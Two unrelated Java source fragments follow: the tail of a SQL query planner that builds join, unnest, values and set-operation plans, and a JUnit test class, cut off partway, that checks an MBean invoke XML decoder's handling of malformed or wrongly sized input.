leftPlanBuilder.getRoot(), rightPlanBuilder.getRoot(), equiClauses.build(), ImmutableList.<VariableReferenceExpression>builder() .addAll(leftPlanBuilder.getRoot().getOutputVariables()) .addAll(rightPlanBuilder.getRoot().getOutputVariables()) .build(), Optional.empty(), Optional.empty(), Optional.empty(), Optional.empty()); if (node.getType() != INNER) { for (Expression complexExpression : complexJoinExpressions) { Set<InPredicate> inPredicates = subqueryPlanner.collectInPredicateSubqueries(complexExpression, node); if (!inPredicates.isEmpty()) { InPredicate inPredicate = Iterables.getLast(inPredicates); throw notSupportedException(inPredicate, "IN with subquery predicate in join condition"); } } // subqueries can be applied only to one side of join - left side is selected in arbitrary way leftPlanBuilder = subqueryPlanner.handleUncorrelatedSubqueries(leftPlanBuilder, complexJoinExpressions, node); } RelationPlan intermediateRootRelationPlan = new RelationPlan(root, analysis.getScope(node), outputs); TranslationMap translationMap = new TranslationMap(intermediateRootRelationPlan, analysis, lambdaDeclarationToVariableMap); translationMap.setFieldMappings(outputs); translationMap.putExpressionMappingsFrom(leftPlanBuilder.getTranslations()); translationMap.putExpressionMappingsFrom(rightPlanBuilder.getTranslations()); if (node.getType() != INNER && !complexJoinExpressions.isEmpty()) { Expression joinedFilterCondition = ExpressionUtils.and(complexJoinExpressions); Expression rewrittenFilterCondition = translationMap.rewrite(joinedFilterCondition); root = new JoinNode(idAllocator.getNextId(), JoinNodeUtils.typeConvert(node.getType()), leftPlanBuilder.getRoot(), rightPlanBuilder.getRoot(), equiClauses.build(), ImmutableList.<VariableReferenceExpression>builder() .addAll(leftPlanBuilder.getRoot().getOutputVariables()) .addAll(rightPlanBuilder.getRoot().getOutputVariables()) .build(), Optional.of(castToRowExpression(rewrittenFilterCondition)), Optional.empty(), Optional.empty(), Optional.empty()); } if (node.getType() == INNER) { // rewrite all the other conditions using output variables from left + right plan node. PlanBuilder rootPlanBuilder = new PlanBuilder(translationMap, root, analysis.getParameters()); rootPlanBuilder = subqueryPlanner.handleSubqueries(rootPlanBuilder, complexJoinExpressions, node); for (Expression expression : complexJoinExpressions) { postInnerJoinConditions.add(rootPlanBuilder.rewrite(expression)); } root = rootPlanBuilder.getRoot(); Expression postInnerJoinCriteria; if (!postInnerJoinConditions.isEmpty()) { postInnerJoinCriteria = ExpressionUtils.and(postInnerJoinConditions); root = new FilterNode(idAllocator.getNextId(), root, castToRowExpression(postInnerJoinCriteria)); } } return new RelationPlan(root, analysis.getScope(node), outputs); } private void addNullFilters(List<Expression> conditions, Join.Type joinType, Expression left, Expression right) { if (SystemSessionProperties.isOptimizeNullsInJoin(session)) { switch (joinType) { case INNER: addNullFilterIfSupported(conditions, left); addNullFilterIfSupported(conditions, right); break; case LEFT: addNullFilterIfSupported(conditions, right); break; case RIGHT: addNullFilterIfSupported(conditions, left); break; } } } private void addNullFilterIfSupported(List<Expression> conditions, Expression incoming) { if (!(incoming instanceof InPredicate)) { // (A.x IN (1,2,3)) IS NOT NULL is not supported as a join condition as of today. conditions.add(new IsNotNullPredicate(incoming)); } } private RelationPlan planJoinUsing(Join node, RelationPlan left, RelationPlan right) { /* Given: l JOIN r USING (k1, ..., kn) produces: - project coalesce(l.k1, r.k1) ..., coalesce(l.kn, r.kn) l.v1, ..., l.vn, r.v1, ..., r.vn - join (l.k1 = r.k1 and ... l.kn = r.kn) - project cast(l.k1 as commonType(l.k1, r.k1)) ... - project cast(rl.k1 as commonType(l.k1, r.k1)) If casts are redundant (due to column type and common type being equal), they will be removed by optimization passes. */ List<Identifier> joinColumns = ((JoinUsing) node.getCriteria().get()).getColumns(); Analysis.JoinUsingAnalysis joinAnalysis = analysis.getJoinUsing(node); ImmutableList.Builder<JoinNode.EquiJoinClause> clauses = ImmutableList.builder(); Map<Identifier, VariableReferenceExpression> leftJoinColumns = new HashMap<>(); Map<Identifier, VariableReferenceExpression> rightJoinColumns = new HashMap<>(); Assignments.Builder leftCoercions = Assignments.builder(); Assignments.Builder rightCoercions = Assignments.builder(); leftCoercions.putAll(identitiesAsSymbolReferences(left.getRoot().getOutputVariables())); rightCoercions.putAll(identitiesAsSymbolReferences(right.getRoot().getOutputVariables())); for (int i = 0; i < joinColumns.size(); i++) { Identifier identifier = joinColumns.get(i); Type type = analysis.getType(identifier); // compute the coercion for the field on the left to the common supertype of left & right VariableReferenceExpression leftOutput = variableAllocator.newVariable(identifier, type); int leftField = joinAnalysis.getLeftJoinFields().get(i); leftCoercions.put(leftOutput, castToRowExpression(new Cast( new SymbolReference(left.getVariable(leftField).getName()), type.getTypeSignature().toString(), false, metadata.getTypeManager().isTypeOnlyCoercion(left.getDescriptor().getFieldByIndex(leftField).getType(), type)))); leftJoinColumns.put(identifier, leftOutput); // compute the coercion for the field on the right to the common supertype of left & right VariableReferenceExpression rightOutput = variableAllocator.newVariable(identifier, type); int rightField = joinAnalysis.getRightJoinFields().get(i); rightCoercions.put(rightOutput, castToRowExpression(new Cast( new SymbolReference(right.getVariable(rightField).getName()), type.getTypeSignature().toString(), false, metadata.getTypeManager().isTypeOnlyCoercion(right.getDescriptor().getFieldByIndex(rightField).getType(), type)))); rightJoinColumns.put(identifier, rightOutput); clauses.add(new JoinNode.EquiJoinClause(leftOutput, rightOutput)); } ProjectNode leftCoercion = new ProjectNode(idAllocator.getNextId(), left.getRoot(), leftCoercions.build()); ProjectNode rightCoercion = new ProjectNode(idAllocator.getNextId(), right.getRoot(), rightCoercions.build()); JoinNode join = new JoinNode( idAllocator.getNextId(), JoinNodeUtils.typeConvert(node.getType()), leftCoercion, rightCoercion, clauses.build(), ImmutableList.<VariableReferenceExpression>builder() .addAll(leftCoercion.getOutputVariables()) .addAll(rightCoercion.getOutputVariables()) .build(), Optional.empty(), Optional.empty(), Optional.empty(), Optional.empty()); // Add a projection to produce the outputs of the columns in the USING clause, // which are defined as coalesce(l.k, r.k) Assignments.Builder assignments = Assignments.builder(); ImmutableList.Builder<VariableReferenceExpression> outputs = ImmutableList.builder(); for (Identifier column : joinColumns) { VariableReferenceExpression output = variableAllocator.newVariable(column, analysis.getType(column)); outputs.add(output); assignments.put(output, castToRowExpression(new CoalesceExpression( new SymbolReference(leftJoinColumns.get(column).getName()), new SymbolReference(rightJoinColumns.get(column).getName())))); } for (int field : joinAnalysis.getOtherLeftFields()) { VariableReferenceExpression variable = left.getFieldMappings().get(field); outputs.add(variable); assignments.put(variable, castToRowExpression(new SymbolReference(variable.getName()))); } for (int field : joinAnalysis.getOtherRightFields()) { VariableReferenceExpression variable = right.getFieldMappings().get(field); outputs.add(variable); assignments.put(variable, castToRowExpression(new SymbolReference(variable.getName()))); } return new RelationPlan( new ProjectNode(idAllocator.getNextId(), join, assignments.build()), analysis.getScope(node), outputs.build()); } private Optional<Unnest> getUnnest(Relation relation) { if (relation instanceof AliasedRelation) { return getUnnest(((AliasedRelation) relation).getRelation()); } if (relation instanceof Unnest) { return Optional.of((Unnest) relation); } return Optional.empty(); } private Optional<Lateral> getLateral(Relation relation) { if (relation instanceof AliasedRelation) { return getLateral(((AliasedRelation) relation).getRelation()); } if (relation instanceof Lateral) { return Optional.of((Lateral) relation); } return Optional.empty(); } private RelationPlan planLateralJoin(Join join, RelationPlan leftPlan, Lateral lateral) { RelationPlan rightPlan = process(lateral.getQuery(), null); PlanBuilder leftPlanBuilder = initializePlanBuilder(leftPlan); PlanBuilder rightPlanBuilder = initializePlanBuilder(rightPlan); PlanBuilder planBuilder = subqueryPlanner.appendLateralJoin(leftPlanBuilder, rightPlanBuilder, lateral.getQuery(), true, LateralJoinNode.Type.INNER); List<VariableReferenceExpression> outputVariables = ImmutableList.<VariableReferenceExpression>builder() .addAll(leftPlan.getRoot().getOutputVariables()) .addAll(rightPlan.getRoot().getOutputVariables()) .build(); return new RelationPlan(planBuilder.getRoot(), analysis.getScope(join), outputVariables); } private RelationPlan planCrossJoinUnnest(RelationPlan leftPlan, Join joinNode, Unnest node) { RelationType unnestOutputDescriptor = analysis.getOutputDescriptor(node); // Create variables for the result of unnesting ImmutableList.Builder<VariableReferenceExpression> unnestedVariablesBuilder = ImmutableList.builder(); for (Field field : unnestOutputDescriptor.getVisibleFields()) { VariableReferenceExpression variable = variableAllocator.newVariable(field); unnestedVariablesBuilder.add(variable); } ImmutableList<VariableReferenceExpression> unnestedVariables = unnestedVariablesBuilder.build(); // Add a projection for all the unnest arguments PlanBuilder planBuilder = initializePlanBuilder(leftPlan); planBuilder = planBuilder.appendProjections(node.getExpressions(), variableAllocator, idAllocator); TranslationMap translations = planBuilder.getTranslations(); ProjectNode projectNode = (ProjectNode) planBuilder.getRoot(); ImmutableMap.Builder<VariableReferenceExpression, List<VariableReferenceExpression>> unnestVariables = ImmutableMap.builder(); UnmodifiableIterator<VariableReferenceExpression> unnestedVariablesIterator = unnestedVariables.iterator(); for (Expression expression : node.getExpressions()) { Type type = analysis.getType(expression); VariableReferenceExpression inputVariable = new VariableReferenceExpression(translations.get(expression).getName(), type); if (type instanceof ArrayType) { Type elementType = ((ArrayType) type).getElementType(); if (!SystemSessionProperties.isLegacyUnnest(session) && elementType instanceof RowType) { ImmutableList.Builder<VariableReferenceExpression> unnestVariableBuilder = ImmutableList.builder(); for (int i = 0; i < ((RowType) elementType).getFields().size(); i++) { unnestVariableBuilder.add(unnestedVariablesIterator.next()); } unnestVariables.put(inputVariable, unnestVariableBuilder.build()); } else { unnestVariables.put(inputVariable, ImmutableList.of(unnestedVariablesIterator.next())); } } else if (type instanceof MapType) { unnestVariables.put(inputVariable, ImmutableList.of(unnestedVariablesIterator.next(), unnestedVariablesIterator.next())); } else { throw new IllegalArgumentException("Unsupported type for UNNEST: " + type); } } Optional<VariableReferenceExpression> ordinalityVariable = node.isWithOrdinality() ? Optional.of(unnestedVariablesIterator.next()) : Optional.empty(); checkState(!unnestedVariablesIterator.hasNext(), "Not all output variables were matched with input variables"); UnnestNode unnestNode = new UnnestNode(idAllocator.getNextId(), projectNode, leftPlan.getFieldMappings(), unnestVariables.build(), ordinalityVariable); return new RelationPlan(unnestNode, analysis.getScope(joinNode), unnestNode.getOutputVariables()); } @Override protected RelationPlan visitTableSubquery(TableSubquery node, Void context) { return process(node.getQuery(), context); } @Override protected RelationPlan visitQuery(Query node, Void context) { return new QueryPlanner(analysis, variableAllocator, idAllocator, lambdaDeclarationToVariableMap, metadata, session) .plan(node); } @Override protected RelationPlan visitQuerySpecification(QuerySpecification node, Void context) { return new QueryPlanner(analysis, variableAllocator, idAllocator, lambdaDeclarationToVariableMap, metadata, session) .plan(node); } @Override protected RelationPlan visitValues(Values node, Void context) { Scope scope = analysis.getScope(node); ImmutableList.Builder<VariableReferenceExpression> outputVariablesBuilder = ImmutableList.builder(); for (Field field : scope.getRelationType().getVisibleFields()) { outputVariablesBuilder.add(variableAllocator.newVariable(field)); } ImmutableList.Builder<List<RowExpression>> rowsBuilder = ImmutableList.builder(); for (Expression row : node.getRows()) { ImmutableList.Builder<RowExpression> values = ImmutableList.builder(); if (row instanceof Row) { for (Expression item : ((Row) row).getItems()) { Expression expression = Coercer.addCoercions(item, analysis); values.add(castToRowExpression(ExpressionTreeRewriter.rewriteWith(new ParameterRewriter(analysis.getParameters(), analysis), expression))); } } else { Expression expression = Coercer.addCoercions(row, analysis); values.add(castToRowExpression(ExpressionTreeRewriter.rewriteWith(new ParameterRewriter(analysis.getParameters(), analysis), expression))); } rowsBuilder.add(values.build()); } ValuesNode valuesNode = new ValuesNode(idAllocator.getNextId(), outputVariablesBuilder.build(), rowsBuilder.build()); return new RelationPlan(valuesNode, scope, outputVariablesBuilder.build()); } @Override protected RelationPlan visitUnnest(Unnest node, Void context) { Scope scope = analysis.getScope(node); ImmutableList.Builder<VariableReferenceExpression> outputVariablesBuilder = ImmutableList.builder(); for (Field field : scope.getRelationType().getVisibleFields()) { VariableReferenceExpression variable = variableAllocator.newVariable(field); outputVariablesBuilder.add(variable); } List<VariableReferenceExpression> unnestedVariables = outputVariablesBuilder.build(); // If we got here, then we must be unnesting a constant, and not be in a join (where there could be column references) ImmutableList.Builder<VariableReferenceExpression> argumentVariables = ImmutableList.builder(); ImmutableList.Builder<RowExpression> values = ImmutableList.builder(); ImmutableMap.Builder<VariableReferenceExpression, List<VariableReferenceExpression>> unnestVariables = ImmutableMap.builder(); Iterator<VariableReferenceExpression> unnestedVariablesIterator = unnestedVariables.iterator(); for (Expression expression : node.getExpressions()) { Type type = analysis.getType(expression); Expression rewritten = Coercer.addCoercions(expression, analysis); rewritten = ExpressionTreeRewriter.rewriteWith(new ParameterRewriter(analysis.getParameters(), analysis), rewritten); values.add(castToRowExpression(rewritten)); VariableReferenceExpression input = variableAllocator.newVariable(rewritten, type); argumentVariables.add(new VariableReferenceExpression(input.getName(), type)); if (type instanceof ArrayType) { Type elementType = ((ArrayType) type).getElementType(); if (!SystemSessionProperties.isLegacyUnnest(session) && elementType instanceof RowType) { ImmutableList.Builder<VariableReferenceExpression> unnestVariableBuilder = ImmutableList.builder(); for (int i = 0; i < ((RowType) elementType).getFields().size(); i++) { unnestVariableBuilder.add(unnestedVariablesIterator.next()); } unnestVariables.put(input, unnestVariableBuilder.build()); } else { unnestVariables.put(input, ImmutableList.of(unnestedVariablesIterator.next())); } } else if (type instanceof MapType) { unnestVariables.put(input, ImmutableList.of(unnestedVariablesIterator.next(), unnestedVariablesIterator.next())); } else { throw new IllegalArgumentException("Unsupported type for UNNEST: " + type); } } Optional<VariableReferenceExpression> ordinalityVariable = node.isWithOrdinality() ? Optional.of(unnestedVariablesIterator.next()) : Optional.empty(); checkState(!unnestedVariablesIterator.hasNext(), "Not all output variables were matched with input variables"); ValuesNode valuesNode = new ValuesNode( idAllocator.getNextId(), argumentVariables.build(), ImmutableList.of(values.build())); UnnestNode unnestNode = new UnnestNode(idAllocator.getNextId(), valuesNode, ImmutableList.of(), unnestVariables.build(), ordinalityVariable); return new RelationPlan(unnestNode, scope, unnestedVariables); } private RelationPlan processAndCoerceIfNecessary(Relation node, Void context) { Type[] coerceToTypes = analysis.getRelationCoercion(node); RelationPlan plan = this.process(node, context); if (coerceToTypes == null) { return plan; } return addCoercions(plan, coerceToTypes); } private RelationPlan addCoercions(RelationPlan plan, Type[] targetColumnTypes) { RelationType oldRelation = plan.getDescriptor(); List<VariableReferenceExpression> oldVisibleVariables = oldRelation.getVisibleFields().stream() .map(oldRelation::indexOf) .map(plan.getFieldMappings()::get) .collect(toImmutableList()); RelationType oldRelationWithVisibleFields = plan.getDescriptor().withOnlyVisibleFields(); verify(targetColumnTypes.length == oldVisibleVariables.size()); ImmutableList.Builder<VariableReferenceExpression> newVariables = new ImmutableList.Builder<>(); Field[] newFields = new Field[targetColumnTypes.length]; Assignments.Builder assignments = Assignments.builder(); for (int i = 0; i < targetColumnTypes.length; i++) { VariableReferenceExpression inputVariable = oldVisibleVariables.get(i); Type outputType = targetColumnTypes[i]; if (!outputType.equals(inputVariable.getType())) { Expression cast = new Cast(new SymbolReference(inputVariable.getName()), outputType.getTypeSignature().toString()); VariableReferenceExpression outputVariable = variableAllocator.newVariable(cast, outputType); assignments.put(outputVariable, castToRowExpression(cast)); newVariables.add(outputVariable); } else { SymbolReference symbolReference = new SymbolReference(inputVariable.getName()); VariableReferenceExpression outputVariable = variableAllocator.newVariable(symbolReference, outputType); assignments.put(outputVariable, castToRowExpression(symbolReference)); newVariables.add(outputVariable); } Field oldField = oldRelationWithVisibleFields.getFieldByIndex(i); newFields[i] = new Field( oldField.getRelationAlias(), oldField.getName(), targetColumnTypes[i], oldField.isHidden(), oldField.getOriginTable(), oldField.getOriginColumnName(), oldField.isAliased()); } ProjectNode projectNode = new ProjectNode(idAllocator.getNextId(), plan.getRoot(), assignments.build()); return new RelationPlan(projectNode, Scope.builder().withRelationType(RelationId.anonymous(), new RelationType(newFields)).build(), newVariables.build()); } @Override protected RelationPlan visitUnion(Union node, Void context) { checkArgument(!node.getRelations().isEmpty(), "No relations specified for UNION"); SetOperationPlan setOperationPlan = process(node); PlanNode planNode = new UnionNode(idAllocator.getNextId(), setOperationPlan.getSources(), setOperationPlan.getOutputVariables(), setOperationPlan.getVariableMapping()); if (node.isDistinct()) { planNode = distinct(planNode); } return new RelationPlan(planNode, analysis.getScope(node), planNode.getOutputVariables()); } @Override protected RelationPlan visitIntersect(Intersect node, Void context) { checkArgument(!node.getRelations().isEmpty(), "No relations specified for INTERSECT"); SetOperationPlan setOperationPlan = process(node); PlanNode planNode = new IntersectNode(idAllocator.getNextId(), setOperationPlan.getSources(), setOperationPlan.getOutputVariables(), setOperationPlan.getVariableMapping()); return new RelationPlan(planNode, analysis.getScope(node), planNode.getOutputVariables()); } @Override protected RelationPlan visitExcept(Except node, Void context) { checkArgument(!node.getRelations().isEmpty(), "No relations specified for EXCEPT"); SetOperationPlan setOperationPlan = process(node); PlanNode planNode = new ExceptNode(idAllocator.getNextId(), setOperationPlan.getSources(), setOperationPlan.getOutputVariables(), setOperationPlan.getVariableMapping()); return new RelationPlan(planNode, analysis.getScope(node), planNode.getOutputVariables()); } private SetOperationPlan process(SetOperation node) { List<VariableReferenceExpression> outputs = null; ImmutableList.Builder<PlanNode> sources = ImmutableList.builder(); ImmutableListMultimap.Builder<VariableReferenceExpression, VariableReferenceExpression> variableMapping = ImmutableListMultimap.builder(); List<RelationPlan> subPlans = node.getRelations().stream() .map(relation -> processAndCoerceIfNecessary(relation, null)) .collect(toImmutableList()); for (RelationPlan relationPlan : subPlans) { List<VariableReferenceExpression> childOutputVariables = relationPlan.getFieldMappings(); if (outputs == null) { // Use the first Relation to derive output variable names RelationType descriptor = relationPlan.getDescriptor(); ImmutableList.Builder<VariableReferenceExpression> outputVariableBuilder = ImmutableList.builder(); for (Field field : descriptor.getVisibleFields()) { int fieldIndex = descriptor.indexOf(field); VariableReferenceExpression variable = childOutputVariables.get(fieldIndex); outputVariableBuilder.add(variableAllocator.newVariable(variable)); } outputs = outputVariableBuilder.build(); } RelationType descriptor = relationPlan.getDescriptor(); checkArgument(descriptor.getVisibleFieldCount() == outputs.size(), "Expected relation to have %s variables but has %s variables", descriptor.getVisibleFieldCount(), outputs.size()); int fieldId = 0; for (Field field : descriptor.getVisibleFields()) { int fieldIndex = descriptor.indexOf(field); variableMapping.put(outputs.get(fieldId), childOutputVariables.get(fieldIndex)); fieldId++; } sources.add(relationPlan.getRoot()); } return new SetOperationPlan(sources.build(), variableMapping.build()); } private PlanBuilder initializePlanBuilder(RelationPlan relationPlan) { TranslationMap translations = new TranslationMap(relationPlan, analysis, lambdaDeclarationToVariableMap); // Make field->variable mapping from underlying relation plan available for translations // This makes it possible to rewrite FieldOrExpressions that reference fields from the underlying tuple directly translations.setFieldMappings(relationPlan.getFieldMappings()); return new PlanBuilder(translations, relationPlan.getRoot(), analysis.getParameters()); } private PlanNode distinct(PlanNode node) { return new AggregationNode(idAllocator.getNextId(), node, ImmutableMap.of(), singleGroupingSet(node.getOutputVariables()), ImmutableList.of(), AggregationNode.Step.SINGLE, Optional.empty(), Optional.empty()); } private static class SetOperationPlan { private final List<PlanNode> sources; private final List<VariableReferenceExpression> outputVariables; private final Map<VariableReferenceExpression, List<VariableReferenceExpression>> variableMapping; private SetOperationPlan(List<PlanNode> sources, ListMultimap<VariableReferenceExpression, VariableReferenceExpression> variableMapping) { this.sources = sources; this.outputVariables = ImmutableList.copyOf(variableMapping.keySet()); Map<VariableReferenceExpression, List<VariableReferenceExpression>> mapping = new LinkedHashMap<>(); variableMapping.asMap().forEach((key, value) -> { checkState(value instanceof List, "variableMapping values should be of type List"); mapping.put(key, (List<VariableReferenceExpression>) value); }); this.variableMapping = mapping; } public List<PlanNode> getSources() { return sources; } public List<VariableReferenceExpression> getOutputVariables() { return outputVariables; } public Map<VariableReferenceExpression, List<VariableReferenceExpression>> getVariableMapping() { return variableMapping; } } }
/** * Copyright (c) Microsoft Corporation * * Licensed under the Apache License, Version 2.0 (the "License"); you may not use * this file except in compliance with the License. You may obtain a copy of the * License at http://www.apache.org/licenses/LICENSE-2.0. * * THIS CODE IS PROVIDED *AS IS* BASIS, WITHOUT WARRANTIES OR CONDITIONS * OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION * ANY IMPLIED WARRANTIES OR CONDITIONS OF TITLE, FITNESS FOR A PARTICULAR PURPOSE, * MERCHANTABLITY OR NON-INFRINGEMENT. * * See the Apache Version 2.0 License for specific language governing * permissions and limitations under the License. */ package com.interopbridges.scx.xml; import java.io.StringReader; import java.io.BufferedReader; import org.junit.After; import org.junit.Assert; import org.junit.Before; import org.junit.Test; import com.interopbridges.scx.ScxException; import com.interopbridges.scx.ScxExceptionCode; import com.interopbridges.scx.util.JmxConstant; /** * Testing the XML decoder associated with the POST request to Invoke a MBean method.<br> * * @author Geoff Erasmus * */ public class InvokeDecoderTest { /** * <p> * Test Setup/preparation method that resets/initializes all test specific * variables. * </p> */ @Before public void setup() { } /** * <p> * Method invoked after each unit-test in this class. * </p> */ @After public void TearDown() { } /** * <p> * Verify the input stream is valid and contains the correct amount of data. <br> * If the buffer does not contain the amount of data specified an error should be thrown. * </p> */ @Test public void verifyTooLittleBodyData() throws Exception { try { // We expect 100 chars of data but only supply 8 new InvokeDecoder(new BufferedReader(new StringReader("a string")), 100); Assert.fail("Failed to receive an exception on instantiating an InvokeDecoder."); } catch(Exception e) { Assert.assertTrue( "An SCXException should have been thrown indicating too little data was read", (e.getClass() == ScxException.class)&& (((ScxException)e).getExceptionCode().equals(ScxExceptionCode.ERROR_MALFORMED_INVOKE_XML))); } } /** * <p> * Verify the input stream is valid and contains the correct amount of data. <br> * If the buffer contains more data than the amount specified, the extraneous data will be ignored. * </p> */ @Test public void verifyExtraBodyData() throws Exception { String str = "a string"; InvokeDecoder id = new InvokeDecoder(new BufferedReader(new StringReader(str)), 5); Assert.assertEquals( "Instantiation of InvokeDecoder for a buffer containing extraneous data failed", 5, id.getRawInputData().length()); } /** * <p> * Verify the input stream is valid and contains the correct amount of data. <br> * If the size specified is 0 an error should be thrown. * </p> */ @Test public void verifyNoBodyData() throws Exception { BufferedReader br = new BufferedReader(new StringReader("a string")); try { new InvokeDecoder(br, 0); Assert.fail("Failed to receive an exception on instantiating an InvokeDecoder."); } catch(Exception e) { Assert.assertTrue( "An exception should have been thrown indicating the input length is zero", (e.getClass() == ScxException.class)&& (((ScxException)e).getExceptionCode().equals(ScxExceptionCode.ERROR_INVOKE_NO_BODY))); } } /** * <p> * Verify the input stream is valid and contains the correct amount of data. <br> * If the input BufferedReader is not specified an error should be thrown. * </p> */ @Test public void verifyNoReader() throws Exception { try { new InvokeDecoder(null, 0); Assert.fail("Failed to receive an exception on instantiating an InvokeDecoder."); } catch(Exception e) { Assert.assertTrue( "An exception should have been thrown indicating the input length is zero", (e.getClass() == ScxException.class)&& (((ScxException)e).getExceptionCode().equals(ScxExceptionCode.ERROR_INVOKE_NO_BODY))); } } /** * <p> * Verify the input stream is valid and contains the correct amount of data. <br> * If the length of the data exceeds the maximum allowed an error is thrown. * </p> */ @Test public void verifyTooMuchBodyData() throws Exception { BufferedReader br = new BufferedReader(new StringReader("a string")); try { new InvokeDecoder(br, JmxConstant.MAX_POST_INPUT_XML_SIZE + 1); Assert.fail("Failed to receive an exception on instantiating an InvokeDecoder."); } catch(Exception e) { Assert.assertTrue( "An exception should have been thrown indicating the input length is too big.", (e.getClass() == ScxException.class)&& (((ScxException)e).getExceptionCode().equals(ScxExceptionCode.ERROR_INVOKE_BODY_TOO_LARGE))); } } /** * <p> * Verify the input stream is valid and contains the correct Invoke XML element. <br> * </p> * * <p> * Ideally, the XML would look something like this:<br> * </pre> * &lt;Invoke&rt; * &lt;BeanObjectName&rt;TestMBean&lt;/BeanObjectName&rt; * &lt;Method name="VoidVoidMethod"&rt;&lt;/Method&rt; * &lt;/Invoke&rt;" * </p> */ @Test public void verifyXMLInvokeElement() throws Exception { StringBuffer XMLData = new StringBuffer(). append("<aInvoke>"). append("<BeanObjectName>TestMBean</BeanObjectName>"). append("<Method name=\"VoidVoidMethod\"></Method>"). append("</aInvoke>"); BufferedReader br = new BufferedReader(new StringReader(XMLData.toString())); try { InvokeDecoder id = new InvokeDecoder(br, XMLData.length()); id.DecodeInput(); Assert.fail("Failed to receive an exception on decoding the XML input"); } catch(Exception e) { Assert.assertTrue( "An exception should have been thrown indicating XML input is incorrect.", (e.getClass() == ScxException.class)&& (((ScxException)e).getExceptionCode().equals(ScxExceptionCode.ERROR_MALFORMED_INVOKE_XML))); } } /** * <p> * Verify the input stream is valid and contains the Invoke XML element. <br> * </p> * * <p> * Ideally, the XML would look something like this:<br> * </pre> * &lt;Invoke&rt; * &lt;BeanObjectName&rt;TestMBean&lt;/BeanObjectName&rt; * &lt;Method name="VoidVoidMethod"&rt;&lt;/Method&rt; * &lt;/Invoke&rt;" * </p> */ @Test public void verifyXMLInvokeElementExists() throws Exception { StringBuffer XMLData = new StringBuffer(). append("<BeanObjectName>TestMBean</BeanObjectName>"). append("<Method name=\"VoidVoidMethod\"></Method>"); BufferedReader br = new BufferedReader(new StringReader(XMLData.toString())); try { InvokeDecoder id = new InvokeDecoder(br, XMLData.length()); id.DecodeInput(); Assert.fail("Failed to receive an exception on decoding the XML input"); } catch(Exception e) { Assert.assertTrue( "An exception should have been thrown indicating XML input is incorrect.", (e.getClass() == ScxException.class)&& (((ScxException)e).getExceptionCode().equals(ScxExceptionCode.ERROR_MALFORMED_INVOKE_XML))); } } /** * <p> * Verify the input stream is valid and contains the BeanObjectName XML element. <br> * </p> * * <p> * Ideally, the XML would look something like this:<br> * </pre> * &lt;Invoke&rt; * &lt;BeanObjectName&rt;TestMBean&lt;/BeanObjectName&rt; * &lt;Method name="VoidVoidMethod"&rt;&lt;/Method&rt; * &lt;/Invoke&rt;" * </p> */ @Test public void verifyXMLBeanObjectNameElementExists() throws Exception { StringBuffer XMLData = new StringBuffer(). append("<Invoke>"). append("<Method name=\"VoidVoidMethod\"></Method>"). append("</Invoke>"); BufferedReader br = new BufferedReader(new StringReader(XMLData.toString())); try { InvokeDecoder id = new InvokeDecoder(br, XMLData.length()); id.DecodeInput(); Assert.fail("Failed to receive an exception on instantiating an InvokeDecoder."); } catch(Exception e) { Assert.assertTrue( "An exception should have been thrown indicating XML input is incorrect.", (e.getClass() == ScxException.class)&& (((ScxException)e).getExceptionCode().equals(ScxExceptionCode.ERROR_MALFORMED_INVOKE_XML))); } } /** * <p> * Verify the input stream is valid and contains the correct BeanObjectName XML element. <br> * </p> * * <p> * Ideally, the XML would look something like this:<br> * </pre> * &lt;Invoke&rt; * &lt;BeanObjectName&rt;TestMBean&lt;/BeanObjectName&rt; * &lt;Method name="VoidVoidMethod"&rt;&lt;/Method&rt; * &lt;/Invoke&rt;" * </p> */ @Test public void verifyXMLBeanObjectNameElement() throws Exception { StringBuffer XMLData = new StringBuffer(). append("<Invoke>"). append("<aBeanObjectName>TestMBean</aBeanObjectName>"). append("<Method name=\"VoidVoidMethod\"></Method>"). append("</Invoke>"); BufferedReader br = new BufferedReader(new StringReader(XMLData.toString())); try { InvokeDecoder id = new InvokeDecoder(br, XMLData.length()); id.DecodeInput(); Assert.fail("Failed to receive an exception on instantiating an InvokeDecoder."); } catch(Exception e) { Assert.assertTrue( "An exception should have been thrown indicating XML input is incorrect.", (e.getClass() == ScxException.class)&& (((ScxException)e).getExceptionCode().equals(ScxExceptionCode.ERROR_MALFORMED_INVOKE_XML))); } } /** * <p> * Verify the input stream is valid and contains the Method XML element. <br> * </p> * * <p> * Ideally, the XML would look something like this:<br> * </pre> * &lt;Invoke&rt; * &lt;BeanObjectName&rt;TestMBean&lt;/BeanObjectName&rt; * &lt;Method name="VoidVoidMethod"&rt;&lt;/Method&rt; * &lt;/Invoke&rt;" * </p> */ @Test public void verifyXMLMethodElementExists() throws Exception { StringBuffer XMLData = new StringBuffer(). append("<Invoke>"). append("<BeanObjectName>TestMBean</BeanObjectName>"). append("<aMethod name=\"VoidVoidMethod\"></aMethod>"). append("</Invoke>"); BufferedReader br = new BufferedReader(new StringReader(XMLData.toString())); try { InvokeDecoder id = new InvokeDecoder(br, XMLData.length()); id.DecodeInput(); Assert.fail("Failed to receive an exception on instantiating an InvokeDecoder."); } catch(Exception e) { Assert.assertTrue( "An exception should have been thrown indicating XML input is incorrect.", (e.getClass() == ScxException.class)&& (((ScxException)e).getExceptionCode().equals(ScxExceptionCode.ERROR_MALFORMED_INVOKE_XML))); } } /** * <p> * Verify the input stream is valid and contains the correct Method XML element. <br> * </p> * * <p> * Ideally, the XML would look something like this:<br> * </pre> * &lt;Invoke&rt; * &lt;BeanObjectName&rt;TestMBean&lt;/BeanObjectName&rt; * &lt;Method name="VoidVoidMethod"&rt;&lt;/Method&rt; * &lt;/Invoke&rt;" * </p> */ @Test public void verifyXML_NoMethodElement() throws Exception { StringBuffer XMLData = new StringBuffer(). append("<Invoke>"). append("<BeanObjectName>TestMBean</BeanObjectName>"). append("</Invoke>"); BufferedReader br = new BufferedReader(new StringReader(XMLData.toString())); try { InvokeDecoder id = new InvokeDecoder(br, XMLData.length()); id.DecodeInput(); Assert.fail("Failed to receive an exception on instantiating an InvokeDecoder."); } catch(Exception e) { Assert.assertTrue( "An exception should have been thrown indicating XML input is incorrect.", (e.getClass() == ScxException.class)&& (((ScxException)e).getExceptionCode().equals(ScxExceptionCode.ERROR_MALFORMED_INVOKE_XML))); } } /** * <p> * Verify the input stream is valid and contains the correct Parameter Type attribute * if the parameter is specified. <br> * </p> * * <p> * Ideally, the XML would look something like this:<br> * </pre> * &lt;Invoke&rt; * &lt;BeanObjectName&rt;TestMBean&lt;/BeanObjectName&rt; * &lt;Method name="VoidVoidMethod"&rt; * &lt;Param type="int"&rt;5&lt;/Param&rt; * 